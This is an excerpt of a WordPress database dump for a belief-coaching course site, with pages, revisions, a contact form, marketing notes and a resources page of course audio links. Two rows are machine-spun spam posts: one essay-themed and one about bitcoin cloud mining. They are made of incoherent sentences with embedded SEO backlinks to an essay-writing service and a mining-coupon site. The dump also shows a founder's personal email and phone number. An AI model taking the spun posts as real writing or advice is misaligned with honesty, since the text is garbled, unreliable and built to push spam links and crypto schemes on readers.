(113, 4194, '2014-03-06 14:32:20', '2014-03-06 19:32:20', 'Need help deciding if BC is right for you? Sign up for free ½ hour of coaching, get free eBook and a taste of the process. This is what we’ll do exactly. It’s not a sales call. We’ll show you how effective it is to work with a professional.  eBook alone: $10.\r\n\r\nThe eBook should attract people to the process.  Re-write toward next steps.  eBook should accurately represent the process, and get them excited.  Geared toward conversion on top of inherent value.  It’s a gateway.  Take out the process. Walk through examples, vivid, touch their own experience.  Embed other videos, testimonials.  Don’t give away curriculum.\r\n\r\nClick HERE to schedule your 20-minute session –\r\n<h6></h6>\r\n<h6></h6>\r\n<h6>BC Coach could convert them into a course-only sale, could convert to with consulting.\r\nHow does coach get paid for converting?  Different than handing them a sold person.  Get a little more.\r\neBook comes with any option as a bonus.\r\nPay $25 for the consult, get it back if they buy the course .  We get lead, if we don’t convert, they get ½ hour and an ebook.  If we convert, we get a sale, discounted.  If just the course, put in AR series that would upgrade them to coaching bundle.\r\nOr offer free coaching as a coupon, with a time lapse expire.\r\nAm I paying for ½ hour sales call.\r\nFree: Show you how process works, help you find core beliefs behind any problem.\r\n$100 if you want to extend and do the process.</h6>\r\nIf coach books referred client to direct coaching, no course, the Coach owes me 20% referral fee for 1 year. bil', 'Free 20-minute Consultation', '', 'inherit', 'open', 'open', '', '107-revision-v1', '', '', '2014-03-06 14:32:20', '2014-03-06 19:32:20', '', 107, 'http://beliefcloset.com/cyb/107-revision-v1', 0, 'revision', '', 0),
(114, 3, '2014-03-06 14:33:42', '2014-03-06 19:33:42', '[tsa id="1" legend="yes" title="yes" view="1" dropdown="yes"] Contact one for more information\r\nContact one for 15 min free consultation\r\nChoose your coach for your CYB program', 'Certified Clear Beliefs Coaches', '', 'publish', 'closed', 'closed', '', 'certified-coaches', '', '', '2018-03-10 16:24:35', '2018-03-10 21:24:35', '', 0, 'http://beliefcloset.com/cyb/?page_id=114', 0, 'page', '', 0),
(115, 4194, '2014-03-06 14:33:42', '2014-03-06 19:33:42', 'Contact one for more information\r\nContact one for 15 min free consultation\r\nChoose your coach for your CYB program', 'Certified Practitioners', '', 'inherit', 'open', 'open', '', '114-revision-v1', '', '', '2014-03-06 14:33:42', '2014-03-06 19:33:42', '', 114, 'http://beliefcloset.com/cyb/114-revision-v1', 0, 'revision', '', 0),
(3991, 9, '2018-04-30 03:21:50', '2018-04-30 08:21:50', '<p>As a way to value something, you must examine it with the leading example of that special factor. There was a modest sarcasam previously phrase. I have heard tales that I''ll discuss within the following paragraph. Whatever the situation, I''m happy to be German. <a href="http://essay-writing.info/term-paper/">term paper help</a> Definitely the commissioners not have acted upon the offer confirmed. Here you are going to receive the finest of attention at an affordable price, and with exceptionally little waiting. Now these highways locate their counterpart within the internet or better called the information Super Highway. The booking is a bit underhanded also.  <h2>Occasionally individuals can not comprehend immaterial faster than other matters covered.</h2><p>To begin with, most recently published novels are expensive, and many folks wish to understand the period they''re going to invest into studying the book will undoubtedly be well spent. As I compose this I''ve yet to complete the book but I could notice how he''d find the employment in this manner Spend a while in your article, and make certain it is unique. This can be the way the narrative begins. I had tons of sixth graders. Talk about a distinguishing experience or believed. Child, he''ll undoubtedly love his summertime! One label is the truth that every one who attends rodeos is really a Country music buff. Rap is really one of to day''s most common music styles. <p style="text-align:center"><img src="http://www.theoi.com/image/img_drakonesmedea.jpg" style="max-width: 500px;border: none"></p>  <h2>It is advantageous and entertaining.</h2><p>One''s opinion of whatever is imaginative, motivation, and influential will differ from individual to person, which is why audio is broken into genres. It really is possible That You understand with all the entirely free version at which you are going to lose out on extra studying models. The aforementioned Program Procedure may function as the 2nd product I would like to tackle. Usa does this approach easily. Amy is rather a talented pupil. If you''re a Collection lover then I''d state that in case you have n''t however read this novel you must do so whenever feasible. By selecting a guide club name you''re developing an id that''s associated with the associates of your own team. A Socratic technique must be used to guide pupils to ask questions for their answers.  <h2>Best of all, it truly is self-contained and nearly odorless.</h2><p>One guaranteed way to do so will be to discover a function or occupation for each and every student who''s enthusiastic about working on the manufacturing. Several students have not discovered the best way to ask questions to find more about an interest they may be learning. After you do so, read all 3 variations. While her topic selection isn''t known, it''s probably that she''s undertaking a post grad course. Within this article I Will discuss these interventions and indicate where they had be beneficial, offering examples where appropriate. The show is, in inclusion, regarded as a satire on a few dilemmas and comedic in its approach. Inside my view, it''s m to reach a midpoint. The background of each genre has grown in various ways.  <h2>Thanks for sharing it, enthusiast is faved by five-stars .</h2><p>It has an unique effect on American culture. In particular different states, at certain distinct times in history, possibly. Student responsibility is among the primary desirable features. Quality in scholarship and service has to be understood in addition to sports performance. Just then, the initial preliminary meeting started. Besides truly being a wellspring of wisdom and truth and company of education, a superb teacher functions forever to foster the desirable qualities of pupils. Sorry, it is vital for you to study it first. The instructor should be fair in his own dealings with the course. <p style="text-align:center"></p>', 'How to Write an Exploratory Article with Taste Papers', '', 'publish', 'closed', 'closed', '', 'how-to-write-an-exploratory-article-with-taste-3', '', '', '2018-05-02 14:26:18', '2018-05-02 19:26:18', '', 0, 'http://clearyourbeliefs.com/?p=3991', 0, 'post', '', 0),
(118, 4194, '2014-03-06 14:35:02', '2014-03-06 19:35:02', 'Lion – creator of BeliefCloset Process\r\nStan – Certified BC Practitioner, Apple Tech, Coach', 'Who We Are', '', 'publish', 'closed', 'closed', '', 'who-we-are', '', '', '2014-05-15 09:41:42', '2014-05-15 14:41:42', '', 0, 'http://beliefcloset.com/cyb/?page_id=118', 0, 'page', '', 0),
(119, 4194, '2014-03-06 14:35:02', '2014-03-06 19:35:02', 'Lion – creator of BeliefCloset Process\r\nStan – Certified BC Practitioner, Apple Tech, Coach', 'Who We Are', '', 'inherit', 'open', 'open', '', '118-revision-v1', '', '', '2014-03-06 14:35:02', '2014-03-06 19:35:02', '', 118, 'http://beliefcloset.com/cyb/118-revision-v1', 0, 'revision', '', 0),
(120, 4194, '2014-03-06 14:35:54', '2014-03-06 19:35:54', '<h1>Contact us with any questions</h1>\r\n<div class="icon_box" style="width: 70%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/9273610ad1b435283befa0d2b3134fad" method="POST"><input name="inf_form_xid" type="hidden" value="9273610ad1b435283befa0d2b3134fad" /><input name="inf_form_name" type="hidden" value="Contact Us Webform" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_ContactUsRequest">Describe the nature of your request. </label>\r\n\r\n<textarea id="inf_custom_ContactUsRequest" cols="24" name="inf_custom_ContactUsRequest" rows="5">  </textarea>\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Contact', '', 'publish', 'closed', 'closed', '', 'contact', '', '', '2014-06-25 13:42:34', '2014-06-25 18:42:34', '', 0, 'http://beliefcloset.com/cyb/?page_id=120', 0, 'page', '', 0),
(121, 4194, '2014-03-06 14:35:54', '2014-03-06 19:35:54', 'Contact (form – for Qs, information, becoming a BCP Coach, free consultation, etc.)', 'Contact', '', 'inherit', 'open', 'open', '', '120-revision-v1', '', '', '2014-03-06 14:35:54', '2014-03-06 19:35:54', '', 120, 'http://beliefcloset.com/cyb/120-revision-v1', 0, 'revision', '', 0),
(2061, 2, '2014-12-29 23:05:03', '2014-12-30 04:05:03', '&nbsp;\r\n\r\n&nbsp;\r\n<p style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></p>\r\n&nbsp;\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h1 style="text-align: center;"> <a href="https://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.6.0</a></h1>', 'CYB-eBook PROMISE', '', 'publish', 'closed', 'closed', '', 'cyb-ebook', '', '', '2018-04-17 20:45:54', '2018-04-18 01:45:54', '', 0, 'http://clearyourbeliefs.com/?page_id=2061', 0, 'page', '', 0),
(3958, 9, '2018-04-19 08:11:26', '2018-04-19 13:11:26', '<p>Whatever you must do is enroll in a cloud mining site plus some of them will provide you free hashing power. Computers work to address complex mathematical difficulties. BW is devoted to providing users an easy, professional, safe and effective mining platform. The very first issue to do is open an account at Genesis Mining, it''s free of charge, and you may begin your investments whenever you would like.<!--more--> Cloud mining productivity is dependent on a lot of distinct elements. Client info, particularly, should stay private. Cloud mining is done by means of an outsider yet you, the client, get a few of their mining limit and you receive the income with that mining. Besides a Usenet provider, you are in need of a Usenet client.  <h2>Established and Successful Trading Card Game.</h2></p><p>Everything happens online, the organization is trustworthy for the install and security of the equipment. Conclusion With the proper info and tools, Bitcoin mining isn''t only rewarding, it''s also a fun and secure means to transfer money throughout the world wide web. Cloud mining, as its name suggests is a means to do away with the bother of hardware, software, electricity bills etc.. The Bitcoin network compensates Bitcoin miners because of their attempt simply by releasing bitcoin to folks who contribute the necessary computational power. Conclusion If you haven''t tried cloud mining, it might be worth giving it a go. Actually, many say the world is a lot more corrupt today. If you cannot conserve money by yourself, you might want to examine the list of angel investors in the venture capital directory. Savings deposit Savings accounts in banks are among the best schemes to spend less in India. Another profitable choice is investing in ASICcards designed solely with the goal of mining.  <h2>Retrieved 23 April 2016.</h2></p><p>The miner might never recoup their investment. Most pools take a proportion of the income for a pool fee. If you are aware of what your diamonds are worth, you ought to be in a position to walk away from a sale completely happy. In addition to that, these services have become increasingly popular mostly since they just require the trader to state the risk tolerance and once that''s done the procedure is going to be automatized from there. There continue to be many more to select from. It''s possible for you to find free of cost bitcoin through the procedure for trading also. There should be a lot of providers available to you and you''ll be able to consider all these with services specializing in comparisons and estimates. After all, an individual could only boost their business capabilities by upping the amount of firms which deal with them.  <h2>Registering with an exchange There are multiple digital currency exchanges you can register with.</h2></p><p>Therefore, if you feel that a business or a market has to accept losses in the brief term, which means you can use CFDs to put in a brief position and your profit increases, when it drops. A great option here is always to keep the full-time job at first, and begin your business part-time, and therefore you don''t have to worry about your monetary security. Any company that provides free trials, particularly if they require payment info, is most likely a scam artist. When the service is outsourced, you''re already selecting the expert services of highly skilled telephone advertising call center agents that would already have a huge quantity of experience at their disposal and to your benefit. Information needs to be precise, and easy for everybody to understand. Internet businesses have been booming for many years now. CCG Mining is an expert team that''s doing everything in its capacity to produce the tagline We make it simple for you available to anybody, no matter where they live, while offering the most flexible and cost-competitive solutions. Conclusion and Prediction In summary, when you consider all the aforementioned, I think that it is exceedingly possible that online businesses are going to be on the growth in the immediate future. Asking a renowned expert in your niche to talk about their knowledge on your website is a wonderful method to inject interest in your blog.  <h2>Download the Jaxx Blockchain Wallet from your favorite App Store.</h2></p><p>Ads linked to Bitcoin and other cryptocurrencies also have been wiped away from social networking websites and search engines in the nation. Once you start the sale procedure, keep in mind that you always have the choice of backing out. In many instances, finding another job isn''t a great alternative. In order to keep the decorum of the organization, you''ve got to be quite rigid with your work and file management however much of time that it takes and how boring it can be. Among the toughest jobs in outsourcing your processes is finding the perfect people to employ. At the exact same time, there are particular <a href="https://cloud-mining-coupon.com/">cloud mining coupon</a> drawbacks which users must know about. In most instances, human-made disasters are in the shape of a fire that may burn all the essential documents for an organization and any systems that store valuable customer info.    <h2>If so, what is a beginner''s guide to Bitcoin mining?</h2></p><p>In order to acquire the ideal price, there are many measures you may take. For quite a few, there isn''t any decision. If you''re intent on starting your own business you will reach a place where you''ve got to stop planning and begin doing. Bear in mind that cryptocurrencies are incredibly volatile and that could wildly affect your possible profit. Going head-to-head with an established company with no distinguishable difference doesn''t provide you an advantage. The good thing is that there''s plenty of choice available especially online regarding how to advertise or advertise your organization. Becoming proactive at the start of your company startups foundation can work to come up with a culture that employees take pride in being part of and also help express your vision into the very long term. There are several ways for a company to grow, because of the inherent flexibility of telemarketing. If you''re just starting out in the company, it''s possible that you don''t have the experience that is actually essential to teach a neighborhood class. \r\n</p>', 'How many bitcoins can you reach?', '', 'publish', 'closed', 'closed', '', 'how-many-bitcoins-can-you-reach', '', '', '2018-04-19 08:30:06', '2018-04-19 13:30:06', '', 0, 'http://clearyourbeliefs.com/?p=3958', 0, 'post', '', 0),
(132, 4194, '2014-03-06 16:15:30', '2014-03-06 21:15:30', '[wps_checkout]\r\n\r\n[vfb id=1]', 'Checkout', '', 'inherit', 'closed', 'open', '', '86-revision-v1', '', '', '2014-03-06 16:15:30', '2014-03-06 21:15:30', '', 86, 'http://beliefcloset.com/cyb/86-revision-v1', 0, 'revision', '', 0),
(133, 4194, '2014-03-06 17:38:47', '2014-03-06 22:38:47', '[wps-checkout]\r\n\r\n[vfb id=1]', 'Checkout', '', 'inherit', 'closed', 'open', '', '86-revision-v1', '', '', '2014-03-06 17:38:47', '2014-03-06 22:38:47', '', 86, 'http://beliefcloset.com/cyb/86-revision-v1', 0, 'revision', '', 0),
(134, 4194, '2014-03-12 14:15:38', '2014-03-12 19:15:38', '[tsa id="1" legend="yes" title="yes" view="1" dropdown="yes"] Contact one for more information\r\nContact one for 15 min free consultation\r\nChoose your coach for your CYB program', 'Certified Practitioners', '', 'inherit', 'closed', 'open', '', '114-revision-v1', '', '', '2014-03-12 14:15:38', '2014-03-12 19:15:38', '', 114, 'http://beliefcloset.com/cyb/114-revision-v1', 0, 'revision', '', 0),
(135, 4194, '2014-03-12 14:17:05', '2014-03-12 19:17:05', '[tsa id="1" legend="yes" title="yes" view="1" dropdown="yes"[tsa id="1" legend="yes" title="yes" view="1" dropdown="yes"] Contact one for more information\nContact one for 15 min free consultation\nChoose your coach for your CYB program', 'Certified Practitioners', '', 'inherit', 'closed', 'open', '', '114-autosave-v1', '', '', '2014-03-12 14:17:05', '2014-03-12 19:17:05', '', 114, 'http://beliefcloset.com/cyb/114-autosave-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(139, 4194, '2014-03-12 15:17:23', '2014-03-12 20:17:23', '<div style="margin-left: 28px; width: 860px;">\r\n<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf" target="_blank">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n<h1>Session 1:</h1>\r\n<strong>1.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/1-01_Introduction_to_Clear_Your_Beliefs_by_Lion_Goodman.mp3" target="_blank">Introduction to Clear Your Beliefs</a> with Lion Goodman</strong>\r\n\r\n<strong>1.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/1-02-BeliefCloset_Process_-_Pull_All_the_Old_Junk_Out_of_Your_BeliefCloset-plus-Lesson.mp3" target="_blank">Pull All the Old Junk Out of Your BeliefCloset (audio and lesson)</a></strong>\r\n\r\n<strong>1.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/1-03_Session_1_Bonus_-_Live_Questions___Answers.mp3" target="_blank">Bonus: Live Q &amp;A </strong></a>\r\n\r\n<strong>1.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_1_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Pull All the Old Junk Out of Your BeliefCloset</strong></a>\r\n\r\n  \r\n<h1>Session 2:</h1>\r\n\r\n<strong>2.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/2-01_Clear_Your_Negative_Beliefs_About_Who_You_Are.mp3" target="_blank">Clear Your Negative Beliefs About Who You Are</strong></a>\r\n\r\n<strong>2.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/2-02_BeliefCloset_Process_-_Clear_Your_Negative_Beliefs_About_Who_You_Are.mp3" target="_blank">Lesson: Clear Your Negative Beliefs About Who You Are</strong></a>\r\n\r\n<strong>2.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/2-03_Session_2_Bonus_-_Live_Questions___Answers.mp3" target="_blank"> Bonus: Live Q &amp;A </strong></a>\r\n\r\n<strong>2.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_2_Transcripts_-_Clear_Your_Beliefs__.pdf" target="_blank">Transcript: Clear Your Negative Beliefs About Who You Are</strong></a>\r\n\r\n\r\n<h1>Session 3:</h1>\r\n<strong>3.1: </strong><a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-01_Clear_Your_Limiting_Beliefs_About_Your_Capabilities.mp3" target="_blank"><strong>Clear Your Limiting Beliefs About Your Capabilities</strong></a>\r\n\r\n<strong>3.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-02_Meditation_-_Clear_Your_Beliefs_About_Your_Capabilities.mp3" target="_blank">Meditation: Clear Your Limiting Beliefs About Your Capabilities</strong></a>\r\n\r\n<strong>3.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-03_Lesson_-_Clear_Your_Beliefs_About_Your_Capabilities.mp3" target="_blank">Lesson: Clear Your Limiting Beliefs About Your Capabilities</strong></a>\r\n\r\n<strong>3.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-04_BeliefCloset_Process_-_Clear_Your_Limiting_Beliefs_About_Your_Capabilities.mp3" target="_blank">Continued...Clear Your Limiting Beliefs About Your Capabilities</strong></a>\r\n\r\n<strong>3.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-05_Session_3_Bonus_-_Live_Questions___Answers.mp3" target="_blank">Bonus: Live Q &amp;A</strong></a>\r\n\r\n<strong>3.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_3_Transcripts_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Your Limiting Beliefs About Your Capabilities</strong></a>\r\n\r\n\r\n<h1>Session 4:</h1>\r\n<strong>4.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-01_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\r\n\r\n<strong>4.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-02_Meditation_-_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Meditation: Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\r\n\r\n<strong>4.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-03_Lesson_-_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Lesson: Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\r\n\r\n<strong>4.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-04_BeliefCloset_Process_-_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Continued...Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\r\n\r\n<strong>4.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-05_Session_4_Bonus_-_Live_Questions_and_Answers.mp3" target="_blank">Bonus: Live Q &amp;A</strong></a>\r\n\r\n<strong>4.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_4_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\r\n\r\n\r\n\r\n<h1>Session 5:</h1>\r\n\r\n<strong>5.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-01_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Clear Your Old Beliefs About Money and Work</strong></a>\r\n\r\n<strong>5.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-02_Meditation_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Meditation: Clear Your Old Beliefs About Money and Work</strong></a>\r\n\r\n<strong>5.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-03_Lesson_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Lesson: Clear Your Old Beliefs About Money and Work</strong></a>\r\n\r\n<strong>5.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-04_BeliefCloset_Process_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Continued...Clear Your Old Beliefs About Money and Work</strong></a>\r\n\r\n<strong>5.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-05_Lesson_and_Bonus_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Lesson & Bonus: Live Q &amp;A</strong></a>\r\n\r\n<strong>5.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_5_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Your Old Beliefs About Money and Work</strong></a>\r\n\r\n\r\n<h1>Session 6:</h1>\r\n\r\n<strong>6.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-01_Clear_Uncomfortable_Beliefs_About_Your_Body___Health.mp3" target="_blank">Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\r\n\r\n<strong>6.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-02_BeliefCloset_Process_-_Clear_Uncomfortable_Beliefs_About_Your_Body___Health.mp3" target="_blank">Continued...Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\r\n\r\n<strong>6.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-03_Lesson_-_Clear_Uncomfortable_Beliefs_About_Your_Body___Health.mp3" target="_blank">Lesson: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\r\n\r\n<strong>6.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-04_Body-Wisdom_Process.mp3" target="_blank">Body Wisdom Process</strong></a>\r\n\r\n<strong>6.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-05_Session_6_Bonus_-_Live_Questions_and_Answers.mp3" target="_blank">Lesson & Bonus: Live Q &amp;A</strong></a>\r\n\r\n<strong>6.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_6_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\r\n\r\n\r\n<h1>Session 7:</h1>\r\n\r\n<strong>7.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-01_Clear_Out_the_Rest_of_the_Junk_in_Your_BeliefCloset.mp3" target="_blank">Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\r\n\r\n<strong>7.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-02_BeliefCloset_Process_-_Clear_Out_the_Rest_of_the_Junk_in_Your_BeliefCloset.mp3" target="_blank">Continued...Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\r\n\r\n<strong>7.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-03_Lesson_-_Clear_Out_the_Rest_of_the_Junk_in_Your_BeliefCloset.mp3" target="_blank">Lesson: Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\r\n\r\n<strong>7.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-04_Session_7_Bonus_-_Live_Questions___Answers.mp3" target="_blank">Lesson & Bonus: Live Q &amp;A</strong></a>\r\n\r\n<strong>7.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_7_Transcripts_-Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\r\n\r\n\r\n<h1>Bonuses:</h1>\r\n<strong>Bonus Call 1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/8-01_Clear_Your_Beliefs_Bonus_Call_with_Lion_Goodman_and_Anodea_Judity.mp3" target="_blank">Anodea Judith on Manifesting with Beliefs</strong></a>\r\n\r\n<strong>Bonus Call 2: <a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3" target="_blank">Carista Luminare, Ph.D. on Love and Relationships. What Makes Love So Confusing? </strong>\r\n</a>\r\n\r\n\r\n<h1>Bonus Materials:</h1>\r\n\r\n<strong>The Belief Self-Diagnosis Exercise: </strong>(First read and do Part 1. Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf" target="_blank">CYB Belief Self-Diagnosis Exercise 2014</a> (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf" target="_blank">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/" target="_blank">HERE</a></strong>.  Or paste this url into your browser:<strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Clear Your Beliefs"</strong> by Lion Goodman, by clicking here: <strong><a href="http://clearyourbeliefs.com/CYB-ebook" target="_blank">http://www.clearyourbeliefs.com/CYB-ebook</a></strong>\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.  PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf" target="_blank">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;\r\n\r\n</div>\r\n<p style="text-align: center;">. . .</p>\r\nPlease feel free to get in touch anytime if we can be of assistance during your journey. If you feel stuck along the way, or if it''s not working for you, contact Lion by email at liongoodman@gmail.com. If it''s a serious problem and you need help right away, call Lion''s office at 1-707-971-7947. And of course, we would love to hear from you if things are going well! Send us periodic reports about your progress and breakthroughs!\r\n.\r\n\r\n<span style="border-radius: 2px; text-indent: 20px; width: auto; padding: 0px 4px 0px 0px; text-align: center; font: bold 11px/20px ''Helvetica Neue'',Helvetica,sans-serif; color: #ffffff; background: #bd081c  no-repeat scroll 3px 50% / 14px 14px; position: absolute; opacity: 1; z-index: 8675309; display: none; cursor: pointer;">Save</span>', 'Resources', '', 'publish', 'closed', 'closed', '123', 'resources', '', '', '2017-08-14 12:00:16', '2017-08-14 17:00:16', '', 0, 'http://beliefcloset.com/cyb/?page_id=139', 0, 'page', '', 0),
(140, 4194, '2014-03-12 15:17:23', '2014-03-12 20:17:23', '', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-03-12 15:17:23', '2014-03-12 20:17:23', '', 139, 'http://beliefcloset.com/cyb/139-revision-v1', 0, 'revision', '', 0),
(172, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'Shopping Cart Page Content', 'Shopping Cart', '', 'publish', 'closed', 'open', '', 'shopping-cart', '', '', '2014-03-13 04:29:05', '2014-03-13 09:29:05', '', 0, 'http://beliefcloset.com/cyb/shopping-cart', 0, 'page', '', 0),
(173, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'Checkout Page Content', 'Checkout', '', 'publish', 'closed', 'open', '', 'checkout-2', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 0, 'http://beliefcloset.com/cyb/checkout-2', 0, 'page', '', 0),
